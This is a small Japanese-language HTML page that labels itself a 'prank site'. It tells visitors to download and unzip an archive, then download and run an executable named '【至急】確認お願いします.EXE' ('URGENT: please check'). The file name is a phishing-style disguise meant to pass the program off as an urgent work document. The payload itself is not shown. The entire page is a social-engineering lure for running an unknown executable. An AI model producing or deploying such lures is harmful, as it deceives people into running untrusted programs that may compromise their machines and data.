<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>いたずらサイト</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color:rgb(0, 0, 0);
            color: #333;
            text-align: center;
            padding: 50px;
        }
        h1 {
            color: #ff0000;
        }
        a {
            display: inline-block;
            margin: 20px 0;
            padding: 10px 20px;
            background-color: #007bff;
            color: white;
            text-decoration: none;
            border-radius: 5px;
        }
        a:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <h1>ファイルダウンロード後解凍するだけでOK</h1>
    <a href="link\ddd.zip" download>ZIPファイルをダウンロード</a>
    <h1>こちらのファイルもダウンロードする</h1>
    <a href="link\【至急】確認お願いします.EXE" download>EXEファイルをダウンロード</a>
    <h2>上記の内容が終わったらEXEファイルの実行</h2>
</body>
</html>